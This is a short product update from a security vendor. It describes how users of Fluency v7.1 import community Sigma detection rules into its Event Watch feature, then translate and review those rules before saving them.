Sigma Rule Support in Fluency
Updated: Feb 19, 2022
With the rollout of Fluency v7.1, we have added initial Sigma rule support. This support gives users the ability to directly import Sigma rules into Fluency’s Event Watch system. Users can now import their favorite rules from repositories such as the SigmaHQ repository at https://github.com/SigmaHQ/sigma (not associated with Fluency).
Importing Sigma rules is a simple procedure.
Once navigating to the Event Watch page, users will notice a new option at the top
Click this button to open the import dialog.
Copy and paste the Sigma rule to be imported into the black area on the left of the dialog. In this example we are importing a rule from the SigmaHQ reporsitory. For any third party rules imported, be sure to pay attention to and include, if necessary, any license requirements before using.
Once the rule has been pasted, users will notice three buttons at the bottom left. These buttons give the user the ability to view the proposed translation, import the rule immediately, or to cancel the entire operations.
Clicking the Translate button will give the user several views into the translated rule on the right.
The initial translation view provided (the first radio buitton) will show how the Event Watch rule looks in its native json format.
The second radio button will show how the translated query itself looks (which can later be copied/pasted between Event Watch and Event Search pages.
The third radio button show the visual representation of the LVDB query tree that is used for both Event Watch and Event Search.
Using these views, the user can make tweaks to the Sigma rule if needed before import.
Import Sigma Rule
Once satisfied (or to immediately import the Sigma rule), click the Import button.
Doing so will import the Sigma rule, translating it into a Fluency query and creating a basic Event Watch behavior. At this point, the user needs only continue filling out the Event Watch behavior page as is normally done when creating a new behavior.
Note that one difference between a typical behavior and an imported Sigma rule is that the Selection Criteria uses an LVDB (LavaDB) query instead of the usual behavior query. This is part of the more robust query system that was implemented to support Sigma rules.
With this new feature rollout, the team at Fluency hopes that its users can make use of the plethora of available Sigma rules developed by the community to improve their security posture as needed.